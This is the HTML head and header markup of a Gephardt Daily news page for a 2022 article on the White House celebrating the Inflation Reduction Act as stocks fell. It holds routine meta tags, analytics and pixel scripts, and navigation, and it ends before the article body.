<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html dir="ltr" lang="en-US"
	prefix="og: https://ogp.me/ns#" > <!--<![endif]-->
<head>
    
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://gephardtdaily.com/xmlrpc.php" />
    
		<!-- All in One SEO Pro 4.2.5.1 - aioseo.com -->
		<title>White House celebrates Inflation Reduction Act as stocks plunge | Gephardt Daily</title>
		<meta name="description" content="President Joe Biden and fellow Democrats hosted a White House celebration Tuesday touting the Inflation Reduction Act as stocks plunged nearly 1,300 points." />
		<meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
		<meta name="google-site-verification" content="Xatn9g1UawIJRW0MoXBHH_xvrr_x1Zwdb0dnjwJTcdA" />
		<meta name="msvalidate.01" content="BAFEF3182E27B7202B63F4F1AEC6934C" />
		<meta name="yandex-verification" content="4a80d7fc9ffed678" />
		<meta name="keywords" content="inflation reduction act,joe biden,stocks" />
		<link rel="canonical" href="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" />
		<meta name="generator" content="All in One SEO Pro (AIOSEO) 4.2.5.1 " />
		<meta property="og:locale" content="en_US" />
		<meta property="og:site_name" content="Gephardt Daily" />
		<meta property="og:type" content="article" />
		<meta property="og:title" content="White House celebrates Inflation Reduction Act as stocks plunge | Gephardt Daily" />
		<meta property="og:description" content="President Joe Biden and fellow Democrats hosted a White House celebration Tuesday touting the Inflation Reduction Act as stocks plunged nearly 1,300 points." />
		<meta property="og:url" content="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" />
		<meta property="fb:app_id" content="335697527588245" />
		<meta property="og:image" content="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg" />
		<meta property="og:image:secure_url" content="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg" />
		<meta property="og:image:width" content="1099" />
		<meta property="og:image:height" content="602" />
		<meta property="article:tag" content="inflation reduction act" />
		<meta property="article:tag" content="joe biden" />
		<meta property="article:tag" content="stocks" />
		<meta property="article:tag" content="business news" />
		<meta property="article:tag" content="us/world news" />
		<meta property="article:published_time" content="2022-09-14T10:00:26+00:00" />
		<meta property="article:modified_time" content="2022-09-14T04:06:17+00:00" />
		<meta property="article:publisher" content="https://www.facebook.com/GephardtDaily" />
		<meta name="twitter:card" content="summary" />
		<meta name="twitter:title" content="White House celebrates Inflation Reduction Act as stocks plunge | Gephardt Daily" />
		<meta name="twitter:description" content="President Joe Biden and fellow Democrats hosted a White House celebration Tuesday touting the Inflation Reduction Act as stocks plunged nearly 1,300 points." />
		<meta name="twitter:image" content="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg" />
		<script type="application/ld+json" class="aioseo-schema">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</script>
		<script type="text/javascript" >
			window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
			ga('create', "UA-57270683-1", { 'cookieDomain': 'gephardtdaily.com','allowLinker': true } );
			ga('require', 'linker');
			ga('linker:autoLink', ['www.gephardtdaily.com']);
			ga('require', 'displayfeatures');
			ga('require', 'linkid', 'linkid.js');
			ga('require', 'outboundLinkTracker');
			ga('require', 'eventTracker');
			ga('require', 'urlChangeTracker');
			ga('require', 'pageVisibilityTracker');
			ga('require', 'mediaQueryTracker');
			ga('require', 'impressionTracker');
			ga('require', 'maxScrollTracker');
			ga('require', 'socialWidgetTracker');
			ga('require', 'cleanUrlTracker');
			ga('send', 'pageview');
		</script>
		<script async src="https://www.google-analytics.com/analytics.js"></script>
		<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/7ylq2lt2/sajx.js' type="text/javascript"></script>
<!-- <script async src="https://gephardtdaily.com/wp-content/plugins/all-in-one-seo-pack-pro/dist/Pro/assets/autotrack.ca946afc.js?ver=4.2.5.1"></script> -->
		<!-- All in One SEO Pro -->

<link rel="icon" type="image/png" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-e1657444201516.png"><link rel="apple-touch-icon" sizes="76x76" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-1-e1657444331217.png"/><link rel="apple-touch-icon" sizes="120x120" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-3-e1657444386422.png"/><link rel="apple-touch-icon" sizes="152x152" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-5-e1657444433570.png"/><link rel="apple-touch-icon" sizes="114x114" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-2-e1657444361578.png"/><link rel="apple-touch-icon" sizes="144x144" href="https://gephardtdaily.com/wp-content/uploads/2022/07/cropped-gep-logo512-4-e1657444408307.png"/><link rel='dns-prefetch' href='//gephardtdaily.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Gephardt Daily &raquo; Feed" href="https://gephardtdaily.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Gephardt Daily &raquo; Comments Feed" href="https://gephardtdaily.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Gephardt Daily &raquo; White House celebrates Inflation Reduction Act as stocks plunge Comments Feed" href="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/gephardtdaily.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='contact-form-7-css'  href='https://gephardtdaily.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.3' type='text/css' media='all' />
<link rel='stylesheet' id='wpos-slick-style-css'  href='https://gephardtdaily.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/css/slick.css?ver=3.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='logo_showcase_style-css'  href='https://gephardtdaily.com/wp-content/plugins/wp-logo-showcase-responsive-slider-slider/assets/css/logo-showcase.css?ver=3.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-frontend-css'  href='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/css/frontend.min.css?ver=4.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-flatpickr-css'  href='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.css?ver=4.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-select2-css'  href='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.css?ver=6.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css'  href='https://gephardtdaily.com/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=6ea45b81e47c58269b68289d05535e19x' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='google-fonts-style-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C600%2C700%7CRoboto%3A400%2C500%2C700&#038;display=swap&#038;ver=11.5.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://gephardtdaily.com/wp-content/themes/Newspaper/style.css?ver=11.5.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='td-legacy-framework-front-style-css'  href='https://gephardtdaily.com/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=6ea45b81e47c58269b68289d05535e19x' type='text/css' media='all' />
<link rel='stylesheet' id='td-standard-pack-framework-front-style-css'  href='https://gephardtdaily.com/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=32b0396dacab6790bdbb765eba5d6338' type='text/css' media='all' />
<script src='//gephardtdaily.com/wp-content/cache/wpfc-minified/2qg5g7t7/sajx.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.js?ver=6.0.2' id='ppress-flatpickr-js'></script> -->
<!-- <script type='text/javascript' src='https://gephardtdaily.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.js?ver=6.0.2' id='ppress-select2-js'></script> -->
<link rel="https://api.w.org/" href="https://gephardtdaily.com/wp-json/" /><link rel="alternate" type="application/json" href="https://gephardtdaily.com/wp-json/wp/v2/posts/703053" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://gephardtdaily.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://gephardtdaily.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0.2" />
<link rel='shortlink' href='https://gephardtdaily.com/?p=703053' />
<link rel="alternate" type="application/json+oembed" href="https://gephardtdaily.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://gephardtdaily.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//gephardtdaily.com/?wordfence_lh=1&hid=191E0C8ED4BB7C217532F34021F214AC');
</script><script>!function(g,s,q,r,d){r=g[r]=g[r]||function(){(r.q=r.q||[]).push(arguments)};d=s.createElement(q);q=s.getElementsByTagName(q)[0];d.src='//d1l6p2sc9645hc.cloudfront.net/gosquared.js';q.parentNode.insertBefore(d,q)}(window,document,'script','_gs');_gs('GSN-263637-L');</script><!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
        <script>
        window.tdb_globals = {"wpRestNonce":"2d989545ae","wpRestUrl":"https:\/\/gephardtdaily.com\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/","globalSettings":{"tdcSavingHistory":"true"},"isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
    
    <style id="tdb-global-colors">
        :root {--accent-color: #fff;}
    </style>
	
			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/gephardtdaily.com\/wp-admin\/","wpRestNonce":"2d989545ae","wpRestUrl":"https:\/\/gephardtdaily.com\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/"};
			</script>
			    <script>
        window.tdaGlobal = {"adminUrl":"https:\/\/gephardtdaily.com\/wp-admin\/","wpRestNonce":"2d989545ae","wpRestUrl":"https:\/\/gephardtdaily.com\/wp-json\/","permalinkStructure":"\/%category%\/%postname%\/","postId":703053};
    </script>
    
<!-- Meta Pixel Code -->
<script type='text/javascript'>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
</script>
<!-- End Meta Pixel Code -->
<script type='text/javascript'>
  fbq('init', '424076534949700', {}, {
    "agent": "wordpress-6.0.2-3.0.7"
});
  </script><script type='text/javascript'>
  fbq('track', 'PageView', []);
  </script>
<!-- Meta Pixel Code -->
<noscript>
<img height="1" width="1" style="display:none" alt="fbpx"
src="https://www.facebook.com/tr?id=424076534949700&ev=PageView&noscript=1" />
</noscript>
<!-- End Meta Pixel Code -->
<link rel="amphtml" href="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/amp/">
<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-57270683-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-57270683-1');
</script>

<script async custom-element="amp-jwplayer" src="https://cdn.ampproject.org/v0/amp-jwplayer-0.1.js"></script>


<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BreadcrumbList",
        "itemListElement": [
            {
                "@type": "ListItem",
                "position": 1,
                "item": {
                    "@type": "WebSite",
                    "@id": "https://gephardtdaily.com/",
                    "name": "Home"
                }
            },
            {
                "@type": "ListItem",
                "position": 2,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://gephardtdaily.com/category/business/",
                    "name": "Business News"
                }
            }
            ,{
                "@type": "ListItem",
                "position": 3,
                    "item": {
                    "@type": "WebPage",
                    "@id": "https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/",
                    "name": "White House celebrates Inflation Reduction Act as stocks plunge"                                
                }
            }    
        ]
    }
</script>
<link rel="icon" href="https://gephardtdaily.com/wp-content/uploads/2018/07/cropped-gep-logo512-100x100.png" sizes="32x32" />
<link rel="icon" href="https://gephardtdaily.com/wp-content/uploads/2018/07/cropped-gep-logo512-300x300.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://gephardtdaily.com/wp-content/uploads/2018/07/cropped-gep-logo512-300x300.png" />
<meta name="msapplication-TileImage" content="https://gephardtdaily.com/wp-content/uploads/2018/07/cropped-gep-logo512-300x300.png" />

<!-- Button style compiled by theme -->

<style>
    .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title,
                .tds-button2 .tdm-btn-text,
                .tds-button2 i,
                .tds-button5:hover .tdm-btn-text,
                .tds-button5:hover i,
                .tds-button6 .tdm-btn-text,
                .tds-button6 i,
                .tdm_block_list .tdm-list-item i,
                .tdm_block_pricing .tdm-pricing-feature i,
                body .tdm-social-item i {
                    color: #467fa0;
                }
                .tds-button1,
                .tds-button6:after,
                .tds-title2 .tdm-title-line:after,
                .tds-title3 .tdm-title-line:after,
                .tdm_block_pricing.tdm-pricing-featured:before,
                .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header,
                .tds-progress-bar1 .tdm-progress-bar:after,
                .tds-progress-bar2 .tdm-progress-bar:after,
                .tds-social3 .tdm-social-item {
                    background-color: #467fa0;
                }
                .tds-button2:before,
                .tds-button6:before,
                .tds-progress-bar3 .tdm-progress-bar:after {
                  border-color: #467fa0;
                }
                .tdm-btn-style1 {
					background-color: #467fa0;
				}
				.tdm-btn-style2:before {
				    border-color: #467fa0;
				}
				.tdm-btn-style2 {
				    color: #467fa0;
				}
				.tdm-btn-style3 {
				    -webkit-box-shadow: 0 2px 16px #467fa0;
                    -moz-box-shadow: 0 2px 16px #467fa0;
                    box-shadow: 0 2px 16px #467fa0;
				}
				.tdm-btn-style3:hover {
				    -webkit-box-shadow: 0 4px 26px #467fa0;
                    -moz-box-shadow: 0 4px 26px #467fa0;
                    box-shadow: 0 4px 26px #467fa0;
				}
</style>

	<style id="tdw-css-placeholder"></style></head>

<body class="post-template-default single single-post postid-703053 single-format-standard td-standard-pack white-house-celebrates-inflation-reduction-act-as-stocks-plunge global-block-template-1 td-boxed-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

            <div class="td-scroll-up  td-hide-scroll-up-on-mob" style="display:none;"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background" style="visibility:hidden"></div>
<div id="td-mobile-nav" style="visibility:hidden">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.facebook.com/GephardtDaily" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="/cdn-cgi/l/email-protection#c2aca7b5b182a5a7b2aaa3b0a6b6a6a3abaebbeca1adaf" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://gephardtdaily.com/feed/" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://twitter.com/@gephardtdaily" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.youtube.com/channel/UC3tE8FL8my2i7kTfltD3X-Q" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#" aria-label="Close"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-menu2-container"><ul id="menu-menu2" class="td-mobile-main-menu"><li id="menu-item-272719" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-272719"><a href="https://gephardtdaily.com/category/top-stories/">TOP STORIES</a></li>
<li id="menu-item-587615" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-587615"><a href="#">NEWS<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-291329" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-291329"><a href="https://gephardtdaily.com/category/local/">LOCAL</a></li>
	<li id="menu-item-291328" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-291328"><a href="https://gephardtdaily.com/category/national-international/">US/WORLD</a></li>
	<li id="menu-item-378728" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-378728"><a href="https://gephardtdaily.com/category/business/">BUSINESS</a></li>
	<li id="menu-item-587616" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-587616"><a target="_blank" href="https://local.gephardtdaily.com/">GEPHARDT BUSINESS DIRECTORY</a></li>
</ul>
</li>
<li id="menu-item-272718" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-272718"><a href="https://gephardtdaily.com/category/entertainment/">ENTERTAINMENT</a></li>
<li id="menu-item-381620" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-381620"><a href="https://gephardtdaily.com/st-george/">ST GEORGE</a></li>
<li id="menu-item-607130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-607130"><a href="https://gephardtdaily.com/coronavirus/">COVID-19</a></li>
<li id="menu-item-602051" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-602051"><a href="https://gephardtdaily.com/bills-tv/">PODCASTS</a></li>
<li id="menu-item-604288" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-604288"><a href="https://gephardtdaily.com/bills-marketplace/">MARKETPLACE</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background" style="visibility:hidden"></div>
<div class="td-search-wrap-mob" style="visibility:hidden">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="https://gephardtdaily.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
	</div>
</div>

    <div id="td-outer-wrap" class="td-theme-wrap">
    
        
            <div class="tdc-header-wrap ">

            <!--
Header style 10
-->

<div class="td-header-wrap td-header-style-10 td-header-background-image">
            <div class="td-header-bg td-container-wrap "></div>
    
            <div class="td-header-top-menu-full td-container-wrap ">
            <div class="td-container td-header-row td-header-top-menu">
                
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	<!-- td weather source: cache -->		<div class="td-weather-top-widget" id="td_top_weather_uid">
			<i class="td-icons broken-clouds-n"></i>
			<div class="td-weather-now" data-block-uid="td_top_weather_uid">
				<span class="td-big-degrees">60.9</span>
				<span class="td-weather-unit">F</span>
			</div>
			<div class="td-weather-header">
				<div class="td-weather-city">Salt Lake City</div>
			</div>
		</div>
		        <div class="td_data_time">
            <div style="visibility:hidden;">

                Wednesday, September 14, 2022
            </div>
        </div>
    <div class="menu-top-container"><ul id="menu-topmenu" class="top-header-menu"><li id="menu-item-331423" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-normal-menu menu-item-331423"><a href="https://gephardtdaily.com/category/special-reports/">SPECIAL REPORTS</a></li>
<li id="menu-item-311238" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-311238"><a href="https://gephardtdaily.com/traffic/">TRAFFIC</a></li>
<li id="menu-item-311239" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-311239"><a href="https://gephardtdaily.com/weather/">WEATHER</a></li>
<li id="menu-item-670182" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-670182"><a href="https://local.gephardtdaily.com/">GEPHARDT BUSINESS DIRECTORY</a></li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
    
        
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.facebook.com/GephardtDaily" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="/cdn-cgi/l/email-protection#5f313a282c1f383a2f373e2d3b2b3b3e363326713c3032" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://gephardtdaily.com/feed/" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://twitter.com/@gephardtdaily" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" rel="nofollow" href="https://www.youtube.com/channel/UC3tE8FL8my2i7kTfltD3X-Q" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>    </div>    </div>

<!-- LOGIN MODAL -->

                <div id="login-form" class="white-popup-block mfp-hide mfp-with-anim td-login-modal-wrap">
                    <div class="td-login-wrap">
                        <a href="#" aria-label="Back" class="td-back-button"><i class="td-icon-modal-back"></i></a>
                        <div id="td-login-div" class="td-login-form-div td-display-block">
                            <div class="td-login-panel-title">Sign in</div>
                            <div class="td-login-panel-descr">Welcome! Log into your account</div>
                            <div class="td_display_err"></div>
                            <form id="loginForm" action="#" method="post">
                                <div class="td-login-inputs"><input class="td-login-input" autocomplete="username" type="text" name="login_email" id="login_email" value="" required><label for="login_email">your username</label></div>
                                <div class="td-login-inputs"><input class="td-login-input" autocomplete="current-password" type="password" name="login_pass" id="login_pass" value="" required><label for="login_pass">your password</label></div>
                                <input type="button"  name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
                                
                            </form>
                            
                            
                            
                            
                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
                            
                            
                            
                            <div class="td-login-info-text"><a class="privacy-policy-link" href="https://gephardtdaily.com/privacy-policy/">Privacy Policy</a></div>
                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
                            <div class="td-login-panel-title">Password recovery</div>
                            <div class="td-login-panel-descr">Recover your password</div>
                            <div class="td_display_err"></div>
                            <form id="forgotpassForm" action="#" method="post">
                                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label for="forgot_email">your email</label></div>
                                <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
                            </form>
                            <div class="td-login-info-text">A password will be e-mailed to you.</div>
                        </div>
                        
                        
                    </div>
                </div>
                            </div>
        </div>
    
    <div class="td-banner-wrap-full td-logo-wrap-full td-logo-mobile-loaded td-container-wrap ">
        <div class="td-header-sp-logo">
            		<div class="td-logo-text-wrap">
			<span class="td-logo-text-container">
				<a class="td-logo-wrap" href="https://gephardtdaily.com/">
											<span class="td-logo-text"> </span>
										<span class="td-tagline-text"> </span>
				</a>
			</span>
		</div>
	        </div>
    </div>

	<div class="td-header-menu-wrap-full td-container-wrap ">
        
        <div class="td-header-menu-wrap td-header-gradient ">
			<div class="td-container td-header-row td-header-main-menu">
				<div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-disable" href="https://gephardtdaily.com/">
			<img class="td-retina-data" data-retina="https://storage.googleapis.com/daily-wp-uploads/1/2016/07/GephardtDaily-onDark280x96.png" src="https://storage.googleapis.com/daily-wp-uploads/1/2016/07/GephardtDaily-onDark280x96.png" alt="Gephardt Daily Logo " title=" Gephardt Daily - Stories Worth Sharing"/>
		</a>
	    </div>
